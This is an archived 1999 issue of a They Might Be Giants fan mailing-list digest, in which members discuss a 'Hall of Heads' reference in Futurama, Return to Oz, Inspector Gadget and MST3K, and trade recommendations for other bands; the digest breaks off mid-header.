Errors-To: owner-tmbg-digest@tmbg.org Reply-To: tmbg-digest@tmbg.org Sender: owner-tmbg-digest@tmbg.org Precedence: bulk From: owner-tmbg-digest@tmbg.org To: tmbg-digest@tmbg.org Subject: tmbg-list Digest #16-29 tmbg-list Digest, Volume 16, Number 29 Friday, 9 April 1999 Today's Topics: TMBG: Machine Upgrade TMBG: Interview with Flansy TMBG: Hall of Heads Re: TMBG: Hall of Heads Re: TMBG: Hall of Heads TMBG: Re: opening band this tour is...[ + The Negro Problem] Re: TMBG: Hall of Heads Re: TMBG: Re: opening band this tour is...[ + The Negro Re: TMBG: Re: opening band this tour is...[ + The Negro Re: TMBG: Rounder Records (Pianosaurus) SEMI-TMBG: poingly and goodnoise in today's suck.com!! Re: TMBG: Hall of Heads Re: TMBG: Hall of Heads Re: TMBG: Hall of Heads Re: TMBG: Hall of Heads Re: TMBG: Hall of Heads Re: TMBG: Hall of Heads Re: TMBG: Hall of Heads TMBG: Rochester show TMBG: Re: tmbg-list Digest #16-28 Re: TMBG: Re: tmbg-list Digest #16-28 TMBG: Re: tmbg-list Digest #16-28 NON-TMBG: Inspector Gadget Re: TMBG: Inspector Gadget & MST3K TMBG Reference Re: TMBG: Hall of Heads TMBG: new on the list Re: TMBG: Inspector Gadget & MST3K TMBG Reference Re: TMBG: new on the list Re: NON-TMBG: Carrie 2 Re: TMBG: Inspector Gadget & MST3K TMBG Reference (plus others) Re: TMBG: Inspector Gadget & MST3K TMBG Reference (plus others) TMBG: Recomended Listening... Re: TMBG: Recomended Listening... Re: TMBG: Recomended Listening... TMBG: Recommended Listening... TMBG: non-tmbg: Grosse Pointe Blank Re: TMBG: non-tmbg: Grosse Pointe Blank Re: TMBG: non-tmbg: Grosse Pointe Blank TMBG: nontmbg: New Idol Virus song. Re: TMBG: nontmbg: New Idol Virus song. TMBG&NON-TMBG:The Lie and Everything after Re: TMBG: non-tmbg: Grosse Pointe Blank Re: TMBG: non-tmbg: Grosse Pointe Blank Administrivia: If you wish to unsubscribe from this mailing send mail to tmbg-digest-request@tmbg.org for instructions on how to be automatically removed. --------------------------------------------------------------------- The views expressed herein are those of the individual authors. --------------------------------------------------------------------- tmbg-list is digested with Digest 3.5b (John Relph ). ---------------------------------------------------------------------- From: Leo Bicknell Message-Id: <199903282022.PAA29786@ussenterprise.ufp.org> Subject: TMBG: Machine Upgrade Date: Sun, 28 Mar 1999 15:22:46 -0500 (EST) www.tmbg.org, along with several other domains that I host have moved to a few (faster) machine. Please let me know if you see any problems that might be left from the move so I can fix them. Thanks. -- Leo Bicknell - bicknell@ufp.org Systems Engineer - Internetworking Engineer - CCIE 3440 Read TMBG List - tmbg-list-request@tmbg.org, www.tmbg.org ------------------------------ From: GhostKrabb@webtv.net (Dexter Flansburgh) Date: Sun, 28 Mar 1999 12:36:41 -0800 (PST) Subject: TMBG: Interview with Flansy Message-ID: <29261-36FE92D9-1270@mailtod-241.iap.bryant.webtv.net> When is this real audio interview with J.F. that's advertised at monopuff.org supposed to be released? They've been saying for a long time that it'll be coming soon. But still no sign of it. I'm eager to hear it. Any info on this? me, Dexburger ------------------------------ Message-ID: <36FE9690.CB2F2103@osu.edu> Date: Sun, 28 Mar 1999 20:52:33 +0000 From: Diana Kocar Subject: TMBG: Hall of Heads Anyone watch that new cartoon on Fox called Futurama? Well, it's about this kid who gets frozen until the year 3000, and in the first episode, (which is on right now) he goes into this museum that has a Hall of Heads in it! There are a bunch of jars with famous peoples' heads in them. I guess that was kind of how I envisioned the song. Matt Groening must be a TMBG fan. :-) Diana ------------------------------ Message-Id: <199903290441.XAA69632@f04n01.cac.psu.edu> Date: Sun, 28 Mar 1999 23:42:53 -0500 From: Jason Fickley Subject: Re: TMBG: Hall of Heads At 08:52 PM 3/28/99 +0000, Diana Kocar wrote: >Anyone watch that new cartoon on Fox called Futurama? Well, it's about >this kid who gets frozen until the year 3000, and in the first episode, >(which is on right now) he goes into this museum that has a Hall of >Heads in it! There are a bunch of jars with famous peoples' heads in >them. I guess that was kind of how I envisioned the song. Matt >Groening must be a TMBG fan. :-) > > >Diana > Did you notice one of the heads was that of Matt Groening? :) --Jason "I don't NEED to drink, I can stop at any time!" Fickley ------------------------------ From: Batbrain99@aol.com Message-ID: <67ffdaf7.36ff0c89@aol.com> Date: Mon, 29 Mar 1999 00:15:53 EST Subject: Re: TMBG: Hall of Heads In a message dated 99-03-28 20:52:37 EST, you write: << Anyone watch that new cartoon on Fox called Futurama? Well, it's about this kid who gets frozen until the year 3000, and in the first episode, (which is on right now) he goes into this museum that has a Hall of Heads in it! There are a bunch of jars with famous peoples' heads in them. I guess that was kind of how I envisioned the song. Matt Groening must be a TMBG fan. :- >> Yes, I just finished watching the show and Hall of Heads was actually the first thing that came to mind for me as well. Of course, this doesn't necessarily mean Groening is a TMBG fan. (Star Trek fan, yes) I mean, come on... when anybody really thinks of what the future will hold, a museum of heads should be in there somewhere. On a lighter note, I always pictured Hall of Heads as heads lined on a wooden shelf, not in jars, singing the song. ~Batbrain ------------------------------ Message-ID: <36FF0481.446D87C0@pacificnet.net> Date: Sun, 28 Mar 1999 21:41:41 -0700 From: Bongo Subject: TMBG: Re: opening band this tour is...[ + The Negro Problem] tmbgirl@juno.com wrote: > oh yeah... and go > buy his [Michael Shelley] albums ("too many movies" "half empty" and cheeky monkey's "four > arms to hold you") okay my cheap plugs are done. > I haven't yet worked up the courage to buy one of his CDs but if I did I would get the one with that country sounding song with the train rhythm but I don't know what its called. I also one to mention a band called "The Negro Problem". I can't all-out reccomend them, but I really think they have a sound that would appeal to many TMBG, BNL, Moxy Fruvous lovers. They have some very catchy stuff. -B O N G O [Attachment omitted, unknown MIME type or encoding (text/html)] ------------------------------ From: Batbrain99@aol.com Message-ID: <6ec6d353.36ff0ceb@aol.com> Date: Mon, 29 Mar 1999 00:17:31 EST Subject: Re: TMBG: Hall of Heads In a message dated 99-03-28 23:43:02 EST, you write: << Did you notice one of the heads was that of Matt Groening? :) >> I also noticed Mulder and Skully. ------------------------------ Message-Id: <199903290533.AAA38972@f04n01.cac.psu.edu> Date: Mon, 29 Mar 1999 00:34:02 -0500 From: Jason Fickley Subject: Re: TMBG: Re: opening band this tour is...[ + The Negro Which song was it that Michael Shelley usually closed his set with during the 98 tour w/TMBG? It was my favorite song of his, and I was wondering if anyone could tell me the name and the cd it's on --Jason-- At 09:41 PM 3/28/99 -0700, Bongo wrote: > > tmbgirl@juno.com wrote: > >> >> >> oh yeah... and go>> buy his [Michael Shelley] albums ("too many movies" "half empty" and cheeky monkey's "four>> arms to hold you")  okay my cheap plugs are done.>>  
>>      I haven't yet worked up the courage to buy one of his CDs but if I did I would get the one with that country sounding song with the train rhythm but I don't know what its called.
>>
>>     I also one to mention a band called "The Negro Problem". I can't all-out reccomend them, but I really think they have a sound that would appeal to many TMBG, BNL, Moxy Fruvous lovers. They have some very catchy stuff.
>>
>> -B    O    N    G    O
>>
>> > > > I haven't yet worked up the courage to buy one of his CDs but if I did I > would get the one with that country sounding song with the train rhythm but I > don't know what its called. > > I also one to mention a band called "The Negro Problem". I can't all-out > reccomend them, but I really think they have a sound that would appeal to > many TMBG, BNL, Moxy Fruvous lovers. They have some very catchy stuff. > > -B O N G O ------------------------------ Message-Id: <3.0.6.32.19990328232741.008c6160@pop.mindspring.com > Date: Sun, 28 Mar 1999 23:27:41 -0600 From: El Dee Bee Subject: Re: TMBG: Re: opening band this tour is...[ + The Negro >I also one to mention a band called >"The Negro Problem". I can't all-out reccomend them, but I really think >they have a sound that would appeal to many TMBG, BNL, Moxy Fruvous lovers. >They have some very catchy stuff. O I, myself, am turned off to it already. Just via the name. LDB -- http://www.lucidx.com/is My egotistical webpage, links to all the webpages I don't keep in my sig. -- http://www.mp3.com/idolv Download some of my music. -- http://members.xoom.com/MaxxIda/ The Official Sam Kieth Webpage - The Maxx IDA -- Contemporary Cartoon Militia is (C) & TM 1998 S. Steven Struble and Kris W. M. Struble. | The Li'l Depressed Boy, Phreeck, Spyder Hunt, and all related characters (C) & TM 1998 S. Steven Struble ------------------------------ Message-ID: <36FF07DE.58D1BE9E@pacificnet.net> Date: Sun, 28 Mar 1999 21:56:03 -0700 From: Bongo Subject: Re: TMBG: Rounder Records (Pianosaurus) GhostKrabb@webtv.net (Dexter Flansburgh) wrote: Date: Sat, 27 Mar 1999 08:59:39 -0800 (PST) > ...one of my favs, Pianosaurus, which is a > very good band that I highly reccomend. What's make Pianosaurus > interesting is that their music is played on toy instuments. They get > some well sounding rythyms and sounds out of those, though. > A few years I got a various artists CD with Pianosaurus on it. The song was "A Funny Thing Happened to Me on the Way to the Toystore" and it very fun and pleasing. I was always meaning to mention them here. If you like the toy piano sound on "We've Got A World That Swings", you love that song. He (or they?) also seem to have TMBGish talent for clever lyrics and word play. Thanks for reminding me about them (him?). I'm on my way now to get the full album. -B O N G O "I'll never take the sidewalk for granite again" -Pianosaurus [Attachment omitted, unknown MIME type or encoding (text/html)] ------------------------------ Date: Mon, 29 Mar 1999 11:25:52 -0700 (MST) From: Jim Kuemmerle Subject: SEMI-TMBG: poingly and goodnoise in today's suck.com!! Message-ID: our very own jason "cap'n profanity" glastetter got his mp3 site linked to by suck.com today! granted, they're not very nice, but traffic's traffic... they also talk about goodnoise, but they fail to mention TMBG. --jim kuemmerle, who once got a letter into the Fish section without being made terrible fun of... j.kuemmerle@m.cc.utah.edu http://www.geocities.com/soho/gallery/4668/ 3/29 -- GLADE at the zephyr, opening for melissa warner, 10 pm $5 4/1 -- THE BROKE GENERATION: readings by JIM MONTGOMERY and JIM KUEMMERLE, @ a cup of joe, 356 W 200 S, SLC, 9 pm $0 ------------------------------ Message-ID: <19990329200322.21923.rocketmail@web312.yahoomail.com> Date: Mon, 29 Mar 1999 12:03:22 -0800 (PST) From: Talcott Starr Subject: Re: TMBG: Hall of Heads --- Batbrain99@aol.com wrote: > Yes, I just finished watching the show and Hall of > Heads was actually the > first thing that came to mind for me as well. Of > course, this doesn't > necessarily mean Groening is a TMBG fan. (Star Trek > fan, yes) I mean, come > on... when anybody really thinks of what the future > will hold, a museum of > heads should be in there somewhere. On a lighter > note, I always pictured > Hall of Heads as heads lined on a wooden shelf, not > in jars, singing the song. > ~Batbrain > Personally, I always pictured it as a sort of factory, with metallic shelves lined with adroid/animatronic heads. (Sort of like the fake Zaphod head form the HHGTTG T.V. series). Actualy the entire song sounds like an infomercial to me. === |\_________\ | Co-Owner of ThetaSoft| | \|___ ___| | http://members.xoom.com/ThetaSoft | || | |-----------------------------------| || | "If you can't see dreams, your eyes are blind" || | -Moxy Fruvous- "Fly" \|___|ALCOTT STARR _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com ------------------------------ Message-ID: <36FFA58F.D147C37F@osu.edu> Date: Mon, 29 Mar 1999 16:08:48 +0000 From: Diana Kocar Subject: Re: TMBG: Hall of Heads > > Yes, I just finished watching the show and Hall of Heads was actually the > first thing that came to mind for me as well. Of course, this doesn't > necessarily mean Groening is a TMBG fan. (Star Trek fan, yes) I mean, come > on... when anybody really thinks of what the future will hold, a museum of > heads should be in there somewhere. On a lighter note, I always pictured > Hall of Heads as heads lined on a wooden shelf, not in jars, singing the song. > ~Batbrain Well...I thought maybe the heads were a coincidence and maybe didn't have to do with TMBG at all, but when I saw the sign in the museum that said, "Hall of Heads," I knew it had to be a TMBG reference! :-) Oh yes, and I did notice that Matt Groening was one of the heads. I guess I kinda imagined that song with jars possibly, or, maybe with shelves....maybe somebody knows what I'm talking about.....once a long time ago I saw this movie, and I think it was some Wizard of Oz sequel or something (does one exist?) and Dorothy went to this place, and there were all these heads lined up on shelves. They were from pretty girls, I think, and there was this queen lady that chose a head to wear every day. I think that can really correlate to the song.....if I'm remembering things right. Anyway, I think I sort of think of that when I hear the song, though I really can't remember the movie too well. Diana ------------------------------ From: Alterian@aol.com Message-ID: <9c5558b5.36fff7a3@aol.com> Date: Mon, 29 Mar 1999 16:58:59 EST Subject: Re: TMBG: Hall of Heads In a message dated 3/29/99 3:05:22 PM Eastern Standard Time, ttoclat42@yahoo.com writes: << Personally, I always pictured it as a sort of factory, with metallic shelves lined with adroid/animatronic heads. (Sort of like the fake Zaphod head form the HHGTTG T.V. series). Actualy the entire song sounds like an infomercial to me. >> I thought of it as a sort of slaughterhouse for humans and there was psycho people chasing the humans around with giant meat clevers..my world is a scary one that I live in in my mind. -Amber the Transcendent ------------------------------ Message-ID: <19990329221501.20892.qmail@hotmail.com> From: "Nathan Mulac DeHoff" Subject: Re: TMBG: Hall of Heads Date: Mon, 29 Mar 1999 14:15:00 PST Diana Kocar wrote: >I guess I kinda imagined that song with jars possibly, or, maybe with >shelves....maybe somebody knows what I'm talking about.....once a >long time ago I >saw this movie, and I think it was some Wizard of Oz sequel or >something (does one >exist?) and Dorothy went to this place, and there were all these >heads lined up on >shelves. They were from pretty girls, I think, and there was this >queen lady that >chose a head to wear every day. I think that can really correlate to >the >song.....if I'm remembering things right. Anyway, I think I sort of >think of that >when I hear the song, though I really can't remember the movie too >well. You're thinking of "Return to Oz." It's been a long time since I've seen it, but I recall it as a decent movie, which was maligned by people who wanted it to be like the MGM picture (which it wasn't). The movie was adapted from _The Land of Oz_ and _Ozma of Oz_, the first two sequels to _Wizard_ (and there were many sequels). In _Ozma of Oz_, Princess Langwidere had thirty heads, and she changed them approximately once per day. When Dorothy refused to trade her head for one of Langwidere's, the Princess locked her in a tower. In the movie, the character of Langwidere was combined with that of Mombi (a wicked witch in _Land_), and the result was a witch who had stolen heads from young women. (There was no explanation in the book of where Langwidere had gotten her heads, but she didn't seem like the type who would have taken them without giving compensation.) A complaint I often hear about the movie from fans of the books is that it was too somber and disturbing (something you wouldn't generally find in the books, or in the MGM film, for that matter). -- May you live in interesting times, Nathan DinnerBell@tmbg.org http://www.geocities.com/Area51/Corridor/5447/ Get Your Private, Free Email at http://www.hotmail.com ------------------------------ From: Alterian@aol.com Message-ID: <90a01f83.36fff826@aol.com> Date: Mon, 29 Mar 1999 17:01:10 EST Subject: Re: TMBG: Hall of Heads In a message dated 3/29/99 4:09:55 PM Eastern Standard Time, kocar.1@osu.edu writes: << once a long time ago I saw this movie, and I think it was some Wizard of Oz sequel or something (does one exist?) and Dorothy went to this place, and there were all these heads lined up on shelves. >> That movie has to be the SCARIEST movie in the world! Well, I remember seeing it when I was little and it freaked me out...but I don't remember much of it now something about some really scary satanic looking fat thing that ticked a lot that helped Dorthy and people were in objects or something. -Amber the Transcendent Mistress ------------------------------ Date: Mon, 29 Mar 1999 17:06:21 -0600 From: Bob Scott Message-ID: <3700076D.EF5C0FC@tmbg.org> Organization: They Might Be Giants, Unofficially http://www.tmbg.org Subject: Re: TMBG: Hall of Heads Batbrain99@aol.com wrote: > In a message dated 99-03-28 20:52:37 EST, you write: > > << Anyone watch that new cartoon on Fox called Futurama? Well, it's about > this kid who gets frozen until the year 3000, and in the first episode, > (which is on right now) he goes into this museum that has a Hall of > Heads in it! There are a bunch of jars with famous peoples' heads in > them. I guess that was kind of how I envisioned the song. Matt > Groening must be a TMBG fan. :- >> > > Yes, I just finished watching the show and Hall of Heads was actually the > first thing that came to mind for me as well. Amazingly enough, tonight's (Monday) episode of Dilbert has heads of employees in jars in an employee named Lena's dungeon/cubicle. No celebrities there, though. bobscott@tmbg.org AKA Bob "a Fett" Scott ------------------------------ Message-ID: <19990330004806.459.qmail@hotmail.com> From: "Nathan Mulac DeHoff" Subject: Re: TMBG: Hall of Heads Date: Mon, 29 Mar 1999 16:48:04 PST Amber wrote: >In a message dated 3/29/99 4:09:55 PM Eastern Standard Time, >kocar.1@osu.edu writes: > ><< once a long time ago I > saw this movie, and I think it was some Wizard of Oz sequel or >something >(does one > exist?) and Dorothy went to this place, and there were all these >heads lined >up on > shelves. >> > >That movie has to be the SCARIEST movie in the world! Well, I >remember seeing >it when I was little and it freaked me out...but I don't remember >much of it >now something about some really scary satanic looking fat thing that >ticked a >lot that helped Dorthy and people were in objects or something. Hey! Tik-Tok is not Satanic! He is a respectable creation of the firm of Smith and Tinker. I would be more respectful of the works of these fine inventors if I were you. Poor Mr. Smith did drown in his own painting. -- May you live in interesting times, Nathan DinnerBell@tmbg.org http://www.geocities.com/Area51/Corridor/5447/ Get Your Private, Free Email at http://www.hotmail.com ------------------------------ From: PRMega@aol.com Message-ID: <7867e6b.37002810@aol.com> Date: Mon, 29 Mar 1999 20:25:36 EST Subject: TMBG: Rochester show Hey all. I need help on getting to this show... can anyone give me directions on how to get there from like, Albany? Thanks. PR Mega ------------------------------ From: TMBJon@aol.com Message-ID: <896cc3e2.37002b67@aol.com> Date: Mon, 29 Mar 1999 20:39:51 EST Subject: TMBG: Re: tmbg-list Digest #16-28 In a message dated 3/28/99 2:05:48 AM Eastern Standard Time, owner-tmbg- digest@tmbg.org writes: << something like famous love songs sung in Esperanto. >> the TV's in Esperanto.. you know that thats a bitch... heh.. actually i wanted to thank y'all i became a regular watch of Sifl & Olly cuz of you. Oh, and Tom Green, too. since so many of us like the same things I was wondering if any of you like Eminem, the white rapper. I just bought the CD and its soooo cool. If any one likes the song My Name Is and isnt sure about getting the CD, GET IT!!!!! Tell me your comments about Eminem. TMBJon! ------------------------------ From: LimeZinger@aol.com Message-ID: <63167e24.37003b26@aol.com> Date: Mon, 29 Mar 1999 21:47:02 EST Subject: Re: TMBG: Re: tmbg-list Digest #16-28 In a message dated 3/29/99 8:54:52 PM, TMBJon@aol.com writes: >Tell me your comments about Eminem. ::gagging noises:: well, you did ask.. sarah ------------------------------ Date: Mon, 29 Mar 1999 22:36:17 -0600 From: Bob Scott Message-ID: <370054C1.68BB7879@tmbg.org> Organization: They Might Be Giants, Unofficially http://www.tmbg.org Subject: TMBG: Re: tmbg-list Digest #16-28 TMBJon@aol.com wrote: > I was wondering if any of you like > Eminem, the white rapper. This could almost fit in with the whole candy discussion which took place not more than 2 weeks ago on this very list! And some candies, such as Pay Day and the Mysterious flavour of Air Heads candies come in white wrappers! I can't say I've heard much by rock sensation Eminem, but if history is any indication, no matter how much they are beloved by the mainstream (i.e. - not by me), they will be left in the mists of time, or as so many of the ultra talented bands of today seem to do, they might even break up, reform, lose Ginger Spice, pick up Vanilla Ice, and finally end up doing commercials for some phone company... bobscott@tmbg.org AKA Bob "Not gonna wear a bee suit" Scott ------------------------------ Message-Id: <199903301848.NAA178806@f04n07.cac.psu.edu> Date: Tue, 30 Mar 1999 13:49:52 -0500 From: Jason Fickley Subject: NON-TMBG: Inspector Gadget Anyone see the preview for the Inspector Gadget movie on E!'s Coming Attractions? That was one of my favorite tv shows as a kid. I heard a lot of the film was shot in Pittsburgh :) Anyway, Matthew Broderick plays Inspector Gadget, Rupert Everett (sp) plays Dr. Klaw (or as he says in the preview "It's just Klaw!"), who dissapointingly has his face visible the entire movie (as opposed to just seeing the back of the chair, with only the arm visible), and Andy Dick apparently plays one of the M.A.D.D. henchmen :) I hope they do the cartoon justice... --Jason-- ------------------------------ Date: Tue, 30 Mar 1999 13:05:35 -0600 From: Bob Scott Message-ID: <3701207F.627ED808@tmbg.org> Organization: They Might Be Giants, Unofficially http://www.tmbg.org Subject: Re: TMBG: Inspector Gadget & MST3K TMBG Reference Jason Fickley wrote: > Matthew Broderick plays > Inspector Gadget, Rupert Everett (sp) plays Dr. Klaw (or as he says in the > preview "It's just Klaw!"), who dissapointingly has his face visible the > entire movie (as opposed to just seeing the back of the chair, with only > the arm visible), and Andy Dick apparently plays one of the M.A.D.D. > henchmen :) Are the rumors correct? Will Joely Fisher play a professor Gadget meets? And I haven't heard anything about a Penny or Brain role in the movie. I trepidatiously await it's release, 'cuz I think it's gotten stink written all over it... On a TMBG note, in an episode of MST3K I was watching the other day, "Mighty Jack" to be exact, Joel shouts out "They Might Be Giants!" after one of the people in the movie said a few other things that something might be... This is one of those cases where I don't know whether to fall into the trap of believing that he was referring to TMBG or some strange Romanian rock group we haven't even begun to understand. bobscott@tmbg.org AKA Bob "not Joely Fisher! Please! No!!!" Scott ------------------------------ Message-ID: <003801be7ae2$640b1cc0$c3b3a4c1@squid> From: "Uncle Squid" Subject: Re: TMBG: Hall of Heads Date: Tue, 30 Mar 1999 20:20:18 +0100 In my mind's eye, I always envisaged The hall of Heads to be a long, dark hallway with just a spec of light at one end and a dullish glow that allows any visitor to just make out the heads' faces. The heads themselves are of course lined up along both sides of the hall. The heads are like the Kraftwork heads and look left, then right, then left, then right, then left, then right for all eternity in tortured repetitiveness. -- Uncle Squid: If the milk turns out to be sour, I aint the kind of pussy to drink it! -- Uncle Squid: If the milk turns out to be sour, I aint the kind of pussy to drink it! Uncle Squid's new site: www.keme.net/~thelimes/uncle_squid/ Other sites by Uncle Squid: http://members.xoom.com/_out_there_/ ||| ICQ: 12605535 ||| Tel: (01206) 502043 ||| Fax: (01206) 514682 ||| ><< Personally, I always pictured it as a sort of factory, with metallic > shelves lined with adroid/animatronic heads. (Sort of like the fake > Zaphod head form the HHGTTG T.V. series). Actualy the entire song sounds > like an infomercial to me. > >> >I thought of it as a sort of slaughterhouse for humans and there was psycho >people chasing the humans around with giant meat clevers..my world is a scary >one that I live in in my mind. >-Amber the Transcendent > ------------------------------ Message-ID: From: "kgreenwell@sa.kevric.com" Subject: TMBG: new on the list Date: Tue, 30 Mar 1999 13:41:32 -0600 Organization: KEVRIC hey, i'm new to this list and have yet to receive my first digest. however, i just wanted to say hi and to ask anyone if they have any info on TMBG in TX anytime soon. or even in a bordering state...will travel :) i have only seen them once in my 6-year fandom and would welcome the opportunity again. thanks. keep the peace and the force will follow. kristi ------------------------------ Message-Id: <199903301956.OAA71472@f04n01.cac.psu.edu> Date: Tue, 30 Mar 1999 14:57:26 -0500 From: Jason Fickley Subject: Re: TMBG: Inspector Gadget & MST3K TMBG Reference At 01:05 PM 3/30/99 -0600, Bob Scott wrote: > Are the rumors correct? Will Joely Fisher play a professor Gadget meets? >And I haven't heard anything about a Penny or Brain role in the movie. I >trepidatiously await it's release, 'cuz I think it's gotten stink written all >over it... I don't know about any of that...I do know that Klaw creats an evil Inspector Gadget (also played by Broderick). Also, the preview showed Penny for a couple seconds, but she didn't look familiar to me. Hopefully it won't have stink written all over it, although the track record of live-action Disney movies does bother me... --Jason-- ------------------------------ Message-ID: <000d01be7ae7$e9c3a620$5a228a81@rcn.nmt.edu> From: "Refund" Subject: Re: TMBG: new on the list Date: Tue, 30 Mar 1999 13:00:08 -0700 Well, then, let me be the first to say hello (or second, depending on how fast I can type this and hit Ctrl+Enter). I am Nick, the Official TMBG Ambassador to the State of New Mexico. Eh...I guess that's all. Just wanted to say hi, and WELCOME TO THE LIST!!! :0) Signed, Nick Wolf, TMBG Ambassador to the State of New Mexico (see?) :0) ----- Original Message ----- From: kgreenwell@sa.kevric.com To: 'TMBG List' Sent: Tuesday, March 30, 1999 12:41 PM Subject: TMBG: new on the list > hey, i'm new to this list and have yet to receive my first digest. however, i > just wanted to say hi and to ask anyone if they have any info on TMBG in TX > anytime soon. or even in a bordering state...will travel :) i have only seen > them once in my 6-year fandom and would welcome the opportunity again. thanks. > > keep the peace and the force will follow. > > kristi > ------------------------------ Message-Id: Date: Tue, 30 Mar 1999 12:06:08 -0800 From: Bob Gonsalves Subject: Re: NON-TMBG: Carrie 2 >On Wed, 24 Mar 1999, Bob Scott wrote: > >> Oh well, the release of the Carrie 2 Soundtrack with Backstabbing Liar >> will make it all better! > >you know, the woman (emily bergl) who stars in that movie is the >ex-girlfriend of my friend/neighbor/musical conspirator glade sowards. he >went and saw it recently, and i'm not sure whether he's over his >nightmares yet... ;) While we're mentioned connections to movie stars, my friend Tommy (stage name Pons Maar) is the Wheeler King in the "Return to Oz" movie recently mentioned here. He's known as a 'rubber suit guy' in Hollywood. ------------------------------ Message-ID: <19990330231929.26501.qmail@hotmail.com> From: "samantha or anything you want" Subject: Re: TMBG: Inspector Gadget & MST3K TMBG Reference (plus others) Date: Tue, 30 Mar 1999 15:19:28 PST Besides asking a few questions, I'd like to inform that my new email is this one, instead of IamSam98@aol.com. Just for those who care. I finally bought the "Why Does The Sun Shine?" LP and I'm not to happy with it. Yeahoo. Two versions of Spy and WDTSS? I own now. I was tickled pink by Whirlpool altho it was not my first contact with the Meat Puppets. On the Unplugged Nirvana CD, they redo one of their songs also. I have not heard them *actually* singing. Ah well. On another note, I think that we already discussed the "TMBG!" refrence in MST3K ... but then again, we re-discuss everything. He was supposedly talking about the movie "TMBG". We all know the real truth. Joel is my hero. Too bad it's all downhill. -Samantha (of the IamSam98@aol.com fame) (what fame?) >From: Bob Scott >Reply-To: Bob Scott >To: tmbg-list@tmbg.org >Subject: Re: TMBG: Inspector Gadget & MST3K TMBG Reference >Date: Tue, 30 Mar 1999 13:05:35 -0600 > >Jason Fickley wrote: > >> Matthew Broderick plays >> Inspector Gadget, Rupert Everett (sp) plays Dr. Klaw (or as he says in the >> preview "It's just Klaw!"), who dissapointingly has his face visible the >> entire movie (as opposed to just seeing the back of the chair, with only >> the arm visible), and Andy Dick apparently plays one of the M.A.D.D. >> henchmen :) > > Are the rumors correct? Will Joely Fisher play a professor Gadget meets? >And I haven't heard anything about a Penny or Brain role in the movie. I >trepidatiously await it's release, 'cuz I think it's gotten stink written all >over it... > On a TMBG note, in an episode of MST3K I was watching the other day, >"Mighty Jack" to be exact, Joel shouts out "They Might Be Giants!" after one >of the people in the movie said a few other things that something might be... >This is one of those cases where I don't know whether to fall into the trap of >believing that he was referring to TMBG or some strange Romanian rock group we >haven't even begun to understand. > >bobscott@tmbg.org >AKA Bob "not Joely Fisher! Please! No!!!" Scott > Get Your Private, Free Email at http://www.hotmail.com ------------------------------ Date: Tue, 30 Mar 1999 22:50:41 -0600 From: Bob Scott Message-ID: <3701A9A1.43DD5AF7@tmbg.org> Organization: They Might Be Giants, Unofficially http://www.tmbg.org Subject: Re: TMBG: Inspector Gadget & MST3K TMBG Reference (plus others) I believe the thread (however many weeks/months ago) was referring to a reference in "The Giant Gila Monster", and not "Mighty Jack". I'm still scouring my tapes of other old episodes of MST3K to see if I can find any other direct references, and I'll try and keep everyone posted. I hope to someday (if theglobe.com will ever get their servers back up) create a page with a list of references to certain things from MST3K, so there's something to look forward to. Well, if you enjoy being bored beyond death, anyway! bobscott@tmbg.org AKA Bob "Ideal loon" Scott samantha or anything you want wrote: > On another note, I think that we already discussed the "TMBG!" refrence > in MST3K ... but then again, we re-discuss everything. He was supposedly > talking about the movie "TMBG". We all know the real truth. Joel is my > hero. Too bad it's all downhill. > AKAbobscott wrote: > > > On a TMBG note, in an episode of MST3K I was watching the other > day, > >"Mighty Jack" to be exact, Joel shouts out "They Might Be Giants!" > after one > >of the people in the movie said a few other things that something might > be... > ------------------------------ Message-Id: <3.0.6.32.19990330232238.008d2bc0@pop.mindspring.com > Date: Tue, 30 Mar 1999 23:22:38 -0600 From: El Dee Bee Subject: TMBG: Recomended Listening... Hey, well, I thought I'd plug a guy who never gets plugged in all the "If you like TMBG, you might like..." discussions. You should go check out James Kolchalka Superstar. Really fun, really insane. Draws keen comicbooks, too. Download Mp3s of him at: http://www.mp3.com/artists/10/james_kochalka_superstar.html Shaughn (LDB) -- http://www.lucidx.com/is My egotistical webpage, links to all the webpages I don't keep in my sig. -- http://www.mp3.com/idolv Download some of my music. -- http://members.xoom.com/MaxxIda/ The Official Sam Kieth Webpage - The Maxx IDA -- Contemporary Cartoon Militia is (C) & TM 1998 S. Steven Struble and Kris W. M. Struble. | The Li'l Depressed Boy, Phreeck, Spyder Hunt, and all related characters (C) & TM 1998 S. Steven Struble ------------------------------ Date: Wed, 31 Mar 1999 02:17:57 -0500 From: Destin Berthelot Subject: Re: TMBG: Recomended Listening... Message-id: <3701CC25.16118E2E@rollins.edu> I rarely get in on the non-tmbg stuff, but I never thought anyone else would bring up James Kochalka. I wholeheartedly agree. I recommend the song "Monkey Vs. Robot," specifically... it always gets a great reaction from whomever I play it for. Usually the reaction is "what the HELL is that?!" followed by "that's one of the coolest things I ever heard." And you can find his comic books and small storybooks in fine comix stores eveywhere. "Quit Your Job" is just a fascinating little book... about Magic Boy, his cat, his robot friend, and a magic ring, on their way to the North Pole... See, this is why I never post about this kind of thing. I also shouldn't be allowed to post at 2:15 in the morning. Go download some mp3s, I'm going to bed. El Dee Bee wrote: > > Hey, well, I thought I'd plug a guy who never gets plugged in all the "If > you like TMBG, you might like..." discussions. You should go check out > James Kolchalka Superstar. Really fun, really insane. Draws keen > comicbooks, too. > > Download Mp3s of him at: > http://www.mp3.com/artists/10/james_kochalka_superstar.html -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Destin Berthelot | "All persons, http://fox.rollins.edu/~dberthelot/ | living or dead, | are purely They Might Be Giants Visual Discography: | coincidental." http://members.xoom.com/theymightbe/ | -Kurt Vonnegut ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ------------------------------ From: LimeZinger@aol.com Message-ID: Date: Wed, 31 Mar 1999 02:24:51 EST Subject: Re: TMBG: Recomended Listening... In a message dated 3/31/99 2:19:24 AM, dberthelot@Rollins.Edu writes: >I also shouldn't be allowed to post at 2:15 in the morning. Go >download some mp3s, I'm going to bed. actually on the topic of recommended listening.. you fellow insomniacs, if it's between midnight and 4am eastern, check this out: http://radio.cbc.ca/radiotwo.ram stuff that's hundreds of times more obscure than TMBG. fun. you'll thank me.:) where IS everybody? tmbg content: a haiku! i have THEY tickets i feel very powerful. not seen Them since aug. oh, that sucks. i don't care. sarah http://members.aol.com/limezinger ------------------------------ Message-ID: <001c01be7b9a$54f25420$5a228a81@rcn.nmt.edu> From: "Refund" Subject: TMBG: Recommended Listening... Date: Wed, 